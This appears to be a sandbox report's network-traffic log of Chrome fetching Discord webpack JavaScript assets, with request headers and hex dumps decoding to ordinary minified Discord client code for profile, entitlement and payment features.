                                                                          Data Ascii: ll,l=e.initialProductSkuId},COLLECTIBLES_SHOP_CLOSE:u,COLLECTIBLES_PRODUCT_DETAILS_OPEN:e=>{e.item.skuId===l&&(l=void 0)},LOGOUT:u})},514296:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return l}}),r("808653"),r("424973");var l,i=r("40778
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 74 3d 3e 28 65 2e 70 75 73 68 28 75 2e 64 65 66 61 75 6c 74 2e 66 72 6f 6d 53 65 72 76 65 72 28 74 29 29 2c 65 29 29 2e 6f 74 68 65 72 77 69 73 65 28 28 29 3d 3e 65 29 2c 5b 5d 29 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 63 79 3d 65 2e 63 75 72 72 65 6e 63 79 2c 74 68 69 73 2e 70 72 69 63 65 3d 65 2e 70 72 69 63 65 2c 74 68 69 73 2e 70 72 69 63 65 73 3d 65 2e 70 72 69 63 65 73 2c 74 68 69 73 2e 73 75 6d 6d 61 72 79 3d 65 2e 73 75 6d 6d 61 72 79 2c 74 68 69 73 2e 69 74 65 6d 73 3d 65 2e 69 74 65 6d 73 7d 7d 7d 2c 34 38 39 31 33 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a
                                                                          Data Ascii: t=>(e.push(u.default.fromServer(t)),e)).otherwise(()=>e),[])})}constructor(e){super(e),this.currency=e.currency,this.price=e.price,this.prices=e.prices,this.summary=e.summary,this.items=e.items}}},489134:function(e,t,r){"use strict";r.r(t),r.d(t,{default:
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 65 29 29 2e 74 6f 48 73 6c 28 29 2c 73 3d 6f 28 7b 68 3a 72 2c 73 3a 6c 2a 74 2c 6c 3a 69 7d 29 3b 72 65 74 75 72 6e 7b 68 65 78 3a 73 2e 74 6f 48 65 78 53 74 72 69 6e 67 28 29 2c 68 73 6c 3a 73 2e 74 6f 48 73 6c 53 74 72 69 6e 67 28 29 7d 7d 2c 5b 65 2c 74 5d 29 3b 72 65 74 75 72 6e 20 72 7d 7d 2c 35 32 38 34 33 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 2c 72 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6c 3d 72 28 22 35 30 39 30 34 33 22 29 2c 69 3d 72 28 22 34 36 32 32 37 34 22 29 2c 6f 3d 72 28 22 34 34 39 39 31 38 22 29 2c 6e 3d 72 28 22 34 39 31 31 31 22 29 3b 66 75 6e
                                                                          Data Ascii: e)).toHsl(),s=o({h:r,s:l*t,l:i});return{hex:s.toHexString(),hsl:s.toHslString()}},[e,t]);return r}},528438:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return s}}),r("222007");var l=r("509043"),i=r("462274"),o=r("449918"),n=r("49111");fun


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          290192.168.2.550025162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/22198.60494a9d4db5b29906c5.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=A_tEuyVy8iqHdI02DBjD2_Kf.MIluBkk8K9XlyGqVu8-1702226715211-0-604800000
                                                                          2023-12-10 16:45:15 UTC969INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 38 39 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 64 66 61 39 32 37 34 38 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 12898Connection: closeCF-Ray: 8336f50dfa927487-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:15 UTC400INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 32 31 39 38 22 5d 2c 7b 33 33 35 31 38 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 73 61 76 65 43 6c 79 64 65 50 72 6f 66 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 61 64 64 43 6c 79 64 65 47 75 69 6c 64 4d 65 6d 62 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 67 65 6e 65 72 61 74 65 50 65 72 73 6f 6e 61 6c 69 74 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 73 65 74 50
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22198"],{335189:function(e,t,r){"use strict";r.r(t),r.d(t,{saveClydeProfile:function(){return s},addClydeGuildMember:function(){return c},generatePersonality:function(){return d},setP
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 72 6e 20 53 7d 2c 73 65 74 50 65 6e 64 69 6e 67 54 68 65 6d 65 43 6f 6c 6f 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 2c 72 65 73 65 74 50 65 6e 64 69 6e 67 43 68 61 6e 67 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 2c 66 65 74 63 68 43 6c 79 64 65 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 2c 66 65 74 63 68 43 6c 79 64 65 50 72 6f 66 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 2c 63 72 65 61 74 65 43 6c 79 64 65 50 72 6f 66 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 7d 2c 73 74 61 72 74 45 64 69 74 69 6e 67 43 6c 79 64 65 50 72 6f 66 69 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c
                                                                          Data Ascii: rn S},setPendingThemeColors:function(){return T},resetPendingChanges:function(){return I},fetchClydeSettings:function(){return C},fetchClydeProfile:function(){return A},createClydeProfile:function(){return L},startEditingClydeProfile:function(){return m},
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 65 6d 62 65 72 5f 70 72 6f 66 69 6c 65 7d 29 2c 6e 75 6c 6c 21 3d 6f 2e 62 6f 64 79 2e 67 75 69 6c 64 5f 6d 65 6d 62 65 72 26 26 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 4d 45 4d 42 45 52 5f 50 52 4f 46 49 4c 45 5f 55 50 44 41 54 45 22 2c 67 75 69 6c 64 4d 65 6d 62 65 72 3a 6f 2e 62 6f 64 79 2e 67 75 69 6c 64 5f 6d 65 6d 62 65 72 2c 67 75 69 6c 64 49 64 3a 65 7d 29 2c 6f 2e 62 6f 64 79 2e 73 65 74 74 69 6e 67 73 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4c 59 44 45 5f 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 53 41 56 45 5f 46 41 49 4c 22 2c 65 72 72 6f 72 73 3a 6e 75 6c 6c 21 3d 3d 28 73 3d 6e 75 6c 6c 3d 3d 3d 28 75 3d 6f 2e 62 6f 64
                                                                          Data Ascii: ember_profile}),null!=o.body.guild_member&&i.default.dispatch({type:"GUILD_MEMBER_PROFILE_UPDATE",guildMember:o.body.guild_member,guildId:e}),o.body.settings;return i.default.dispatch({type:"CLYDE_GUILD_SETTINGS_SAVE_FAIL",errors:null!==(s=null===(u=o.bod
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4c 59 44 45 5f 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 46 45 54 43 48 5f 53 54 41 52 54 22 2c 67 75 69 6c 64 49 64 3a 65 7d 29 3b 74 72 79 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 6e 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 66 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 43 4c 59 44 45 5f 53 45 54 54 49 4e 47 53 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 72 3d 74 2e 62 6f 64 79 3b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4c 59 44 45 5f 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 22 2c 67 75 69 6c 64 49 64 3a 72 2e 67 75 69 6c 64 5f 69 64 2c 73 65 74 74 69
                                                                          Data Ascii: default.dispatch({type:"CLYDE_GUILD_SETTINGS_FETCH_START",guildId:e});try{let t=await n.default.get({url:f.Endpoints.GUILD_CLYDE_SETTINGS(e),oldFormErrors:!0}),r=t.body;i.default.dispatch({type:"CLYDE_GUILD_SETTINGS_FETCH_SUCCESS",guildId:r.guild_id,setti
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 20 61 7d 67 65 74 20 66 65 74 63 68 45 72 72 6f 72 28 29 7b 72 65 74 75 72 6e 20 6e 7d 67 65 74 20 70 72 6f 66 69 6c 65 45 66 66 65 63 74 73 28 29 7b 72 65 74 75 72 6e 20 66 7d 67 65 74 20 74 72 79 49 74 4f 75 74 49 64 28 29 7b 72 65 74 75 72 6e 20 63 7d 67 65 74 50 72 6f 66 69 6c 65 45 66 66 65 63 74 42 79 49 64 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 3f 73 5b 65 5d 3a 76 6f 69 64 20 30 7d 7d 45 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 50 72 6f 66 69 6c 65 45 66 66 65 63 74 53 74 6f 72 65 22 3b 76 61 72 20 5f 3d 6e 65 77 20 45 28 6c 2e 64 65 66 61 75 6c 74 2c 7b 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 45 46 46 45 43 54 53 5f 46 45 54 43 48 3a 28 29 3d 3e 7b 61 3d 21 30 7d 2c 55 53 45 52 5f 50 52 4f 46 49 4c 45 5f 45 46 46 45 43 54 53 5f 46
                                                                          Data Ascii: a}get fetchError(){return n}get profileEffects(){return f}get tryItOutId(){return c}getProfileEffectById(e){return null!=e?s[e]:void 0}}E.displayName="ProfileEffectStore";var _=new E(l.default,{USER_PROFILE_EFFECTS_FETCH:()=>{a=!0},USER_PROFILE_EFFECTS_F
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 41 41 43 48 35 42 41 45 41 41 41 41 41 4c 41 41 41 41 41 41 42 41 41 45 41 41 41 49 43 52 41 45 41 4f 77 3d 3d 22 7d 2c 38 35 39 34 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 2c 69 2c 75 2c 6c 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 52 65 73 74 61 72 74 4d 65 74 68 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 41 6e 69 6d 61 74 69 6f 6e 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 2c 28 75 3d 6e 7c 7c 28 6e 3d 7b 7d 29 29 2e 46 72 6f 6d 4c 6f 6f 70 3d 22 66 72 6f 6d 4c 6f 6f 70 22 2c 75 2e 46 72 6f 6d 53 74 61 72 74 3d 22 66 72 6f 6d 53 74 61 72 74 22 2c 28 6c 3d 69 7c 7c 28 69 3d 7b 7d 29 29 5b 6c 2e 55 4e 53 50 45 43
                                                                          Data Ascii: AACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=="},859498:function(e,t,r){"use strict";var n,i,u,l;r.r(t),r.d(t,{RestartMethod:function(){return n},AnimationTypes:function(){return i}}),(u=n||(n={})).FromLoop="fromLoop",u.FromStart="fromStart",(l=i||(i={}))[l.UNSPEC
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 29 2c 7b 70 65 6e 64 69 6e 67 3a 72 2c 70 65 6e 64 69 6e 67 52 65 66 3a 75 2c 73 65 74 50 65 6e 64 69 6e 67 3a 69 7d 7d 7d 2c 37 38 34 34 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 2c 72 28 22 32 32 32 30 30 37 22 29 2c 72 28 22 38 30 38 36 35 33 22 29 3b 76 61 72 20 6e 3d 72 28 22 38 38 34 36 39 31 22 29 2c 69 3d 72 28 22 38 34 35 39 36 32 22 29 2c 75 3d 65 3d 3e 7b 6c 65 74 20 74 3d 69 2e 64 65 66 61 75 6c 74 2e 70 72 6f 66 69 6c 65 45 66 66 65 63 74 73 2c 5b 72 2c 75 5d 3d 6e 2e 75 73 65 53 74 61 74 65 28 65 29 2c 5b 6c 2c 6f 5d 3d 6e 2e 75 73 65 53 74 61 74 65 28 69 2e
                                                                          Data Ascii: ),{pending:r,pendingRef:u,setPending:i}}},784410:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return u}}),r("222007"),r("808653");var n=r("884691"),i=r("845962"),u=e=>{let t=i.default.profileEffects,[r,u]=n.useState(e),[l,o]=n.useState(i.
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 28 6e 75 6c 6c 29 2c 5b 4c 2c 6d 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 5b 5d 29 3b 28 30 2c 70 2e 64 65 66 61 75 6c 74 29 28 54 29 3b 6c 65 74 5b 44 2c 67 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 30 29 2c 5b 68 2c 52 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 30 29 2c 7b 61 63 63 65 73 73 69 62 69 6c 69 74 79 4c 61 62 65 6c 3a 50 7d 3d 54 2c 5b 76 2c 46 5d 3d 69 2e 75 73 65 53 74 61 74 65 28 2d 43 29 2c 7b 73 74 6f 70 3a 4e 2c 72 65 73 65 74 3a 62 2c 74 69 63 6b 69 6e 67 3a 55 7d 3d 28 30 2c 64 2e 64 65 66 61 75 6c 74 29 28 65 3d 3e 7b 46 28 74 3d 3e 74 2b 65 29 7d 29 3b 69 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 46 28 2d 43 29 2c 6d 28 28 30 2c 45 2e 73 6f 72 74 45 66 66 65 63 74 4c 61 79 65 72 73 29 28 54 2e 65 66 66 65 63 74 73 29 29 7d 2c 5b 54 5d
                                                                          Data Ascii: (null),[L,m]=i.useState([]);(0,p.default)(T);let[D,g]=i.useState(0),[h,R]=i.useState(0),{accessibilityLabel:P}=T,[v,F]=i.useState(-C),{stop:N,reset:b,ticking:U}=(0,d.default)(e=>{F(t=>t+e)});i.useEffect(()=>{F(-C),m((0,E.sortEffectLayers)(T.effects))},[T]
                                                                          2023-12-10 16:45:15 UTC1369INData Raw: 26 26 6e 75 6c 6c 21 3d 72 26 26 76 3e 3d 68 26 26 47 28 21 30 29 2c 65 2e 6c 6f 6f 70 26 26 76 6f 69 64 20 30 21 3d 3d 65 2e 6c 6f 6f 70 44 65 6c 61 79 26 26 65 2e 6c 6f 6f 70 44 65 6c 61 79 3e 30 29 7b 6c 65 74 20 74 3d 65 2e 64 75 72 61 74 69 6f 6e 2b 65 2e 6c 6f 6f 70 44 65 6c 61 79 2c 75 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 76 2d 65 2e 73 74 61 72 74 29 2f 74 29 3b 69 66 28 76 2d 65 2e 73 74 61 72 74 2d 75 2a 74 3e 65 2e 64 75 72 61 74 69 6f 6e 29 72 65 74 75 72 6e 20 54 2e 61 6e 69 6d 61 74 69 6f 6e 54 79 70 65 3d 3d 3d 63 2e 41 6e 69 6d 61 74 69 6f 6e 54 79 70 65 73 2e 49 4e 54 45 52 4d 49 54 54 45 4e 54 26 26 21 59 26 26 6e 75 6c 6c 21 3d 72 26 26 75 3e 3d 72 26 26 47 28 21 30 29 2c 28 30 2c 6e 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a
                                                                          Data Ascii: &&null!=r&&v>=h&&G(!0),e.loop&&void 0!==e.loopDelay&&e.loopDelay>0){let t=e.duration+e.loopDelay,u=Math.floor((v-e.start)/t);if(v-e.start-u*t>e.duration)return T.animationType===c.AnimationTypes.INTERMITTENT&&!Y&&null!=r&&u>=r&&G(!0),(0,n.jsx)("img",{src:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          291192.168.2.550026162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:15 UTC866OUTGET /assets/59310.e3191416559a74901ac0.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=R6EnoBbk51Lpo3KvRRQdoVV8WVsvBs.YF3SveDapLaU-1702226715353-0-604800000
                                                                          2023-12-10 16:45:16 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 30 35 31 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 65 37 39 31 32 36 64 62 30 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:15 GMTContent-Type: application/javascriptContent-Length: 60516Connection: closeCF-Ray: 8336f50e79126db0-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:16 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 39 33 31 30 22 5d 2c 7b 33 31 36 37 31 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 66 65 74 63 68 55 73 65 72 45 6e 74 69 74 6c 65 6d 65 6e 74 73 46 6f 72 41 70 70 6c 69 63 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 66 65 74 63 68 55 73 65 72 45 6e 74 69 74 6c 65 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 66 65 74 63 68 47 69 66 74 61 62 6c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["59310"],{316718:function(t,e,n){"use strict";n.r(e),n.d(e,{fetchUserEntitlementsForApplication:function(){return a},fetchUserEntitlements:function(){return o},fetchGiftabl
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 65 45 6e 74 69 74 6c 65 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 75 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 69 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 72 3d 6e 28 22 32 37 31 35 36 30 22 29 2c 6c 3d 6e 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 6c 65 74 20 65 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 77 61 69 74 28 28 29 3d 3e 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 45 4e 54 49 54 4c 45 4d 45 4e 54 5f 46 45 54 43 48 5f 41 50 50 4c 49 43 41 54 49
                                                                          Data Ascii: eEntitlements:function(){return s}});var u=n("872717"),i=n("913144"),r=n("271560"),l=n("49111");function a(t){let e=!(arguments.length>1)||void 0===arguments[1]||arguments[1];return i.default.wait(()=>{i.default.dispatch({type:"ENTITLEMENT_FETCH_APPLICATI
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 72 65 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 63 68 61 6e 67 65 53 75 62 73 63 72 69 70 74 69 6f 6e 43 75 72 72 65 6e 63 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 63 68 61 6e 67 65 50 61 79 6d 65 6e 74 53 6f 75 72 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 63 6c 65 61 72 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 75 3d 6e 28 22 36 32 37 34 34 35 22 29 2c 69 3d 6e 2e 6e 28 75 29
                                                                          Data Ascii: unction(t,e,n){"use strict";n.r(e),n.d(e,{subscribe:function(){return s},resubscribe:function(){return c},changeSubscriptionCurrency:function(){return S},changePaymentSource:function(){return d},clearError:function(){return E}});var u=n("627445"),i=n.n(u)
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 41 59 4d 45 4e 54 5f 55 50 44 41 54 45 5f 53 55 43 43 45 53 53 22 7d 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 52 45 4d 49 55 4d 5f 50 41 59 4d 45 4e 54 5f 55 50 44 41 54 45 5f 46 41 49 4c 22 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 2c 6e 2c 75 2c 69 29 7b 74 72 79 7b 61 77 61 69 74 20 61 2e 63 68 61 6e 67 65 50 61 79 6d 65 6e 74 53 6f 75 72 63 65 28 74 2c 65 2c 6e 2c 75 2c 69 29 2c 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 52 45 4d 49 55 4d 5f 50 41 59 4d 45 4e 54 5f 55 50 44 41 54 45 5f 53 55 43 43 45 53 53 22 7d 29 7d 63 61 74 63 68 28 74 29 7b 74 68 72 6f 77 20 72
                                                                          Data Ascii: AYMENT_UPDATE_SUCCESS"})}catch(t){throw r.default.dispatch({type:"PREMIUM_PAYMENT_UPDATE_FAIL",error:t}),t}}async function d(t,e,n,u,i){try{await a.changePaymentSource(t,e,n,u,i),r.default.dispatch({type:"PREMIUM_PAYMENT_UPDATE_SUCCESS"})}catch(t){throw r
